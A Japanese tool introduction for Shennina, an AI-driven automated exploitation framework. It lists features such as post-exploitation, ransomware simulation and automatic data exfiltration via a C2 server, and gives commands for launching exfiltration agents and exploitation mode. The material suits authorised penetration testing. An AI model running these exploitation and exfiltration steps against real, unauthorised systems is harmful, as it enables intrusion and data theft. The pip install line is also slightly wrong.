Shennina は、強力な自動化ホスト侵入 / 脆弱性利用フレームワークです。このプロジェクトの主な目的は、人工知能技術を使用してセキュリティスキャン、脆弱性スキャン / 分析、および脆弱性利用開発を完全自動化することです。Shennina は、Metasploit と Nmap という 2 つの強力なネットワークセキュリティツールの一部機能を統合し、侵入テストを実行します。さらに、このツールには、ターゲットホストからデータを自動フィルタリングするためのコマンド制御サーバーも統合されています。
機能紹介
- 脆弱性利用シナリオを見つけるための自動学習メソッドの実装
- ホスティングされた並行設計を使用した高性能実行
- スマートクラスターペネトレーションテスト / 脆弱性利用
- ポストエクスプロイト機能
- ディセプション攻撃の検出
- ランサムウェアシミュレーション機能
- 自動データフィルタリング
- オプションの脆弱性スキャンモード
- ヒューリスティックモードでの推奨ペネトレーションテストシナリオの取得
- Windows、Linux、および macOS プロキシのサポート
- ポストエクスプロイトフェーズのスクリプト化された攻撃 / ペネトレーションモード
- カーネルに対する脆弱性利用 / ペネトレーションソリューションの提案
- 脆弱性利用シナリオに対するサイドチャネル技術のテスト
- ターゲットサーバー内の重要なデータの自動フィルタリング
- レポートの生成
- MITRE ATT&CK フレームワークの 40 以上の TTP をカバー
- 複数の入力ターゲットのサポート
ツールのダウンロード#
このツールは Python で開発されているため、まずローカルデバイスに Python 環境をインストールして設定する必要があります。次に、次のコマンドを使用してこのプロジェクトのソースコードをローカルにクローンします:
git clone https://github.com/mazen160/shennina.git
その後、pip コマンドとプロジェクトが提供する requirements.txt ファイルを使用して、ツールに必要な依存関係のコンポーネントをインストールします:
cd Shennina
pip install requirements.txt
また、このプロジェクトのリリースページにアクセスして、ツールの最新リリースバージョンをダウンロードすることもできます。
ツールの実行#
エクスフィルトレーションサーバー - エージェント
Linux/macOS
./exfiltration-server/agent.sh
Windows
./exfiltration-server/agent.ps1
エクスフィルトレーションサーバー - 実行
$ cd ./exfiltration-server/
$ ./run-server.sh
MSFRPCD サーバー
./scripts/run-msfrp.py
サービススキャンの実行
$ ./shennina.py --lhost metasploit-ip --target target.local --service-scan-only
トレーニングモードで Shennina を実行
$ ./shennina.py --training-mode --lhost lhost.local --target training-target.local
ペネトレーションテストモード
$ ./shennina.py --lhost lhost.local --target target.local --exploitation-mode
ペネトレーションテストモード - ヒューリスティック
$ ./shennina.py --lhost lhost.local --target target.local --exploitation-mode --secondary-mode
プロジェクトのリンク
Shennina:https://github.com/mazen160/shennina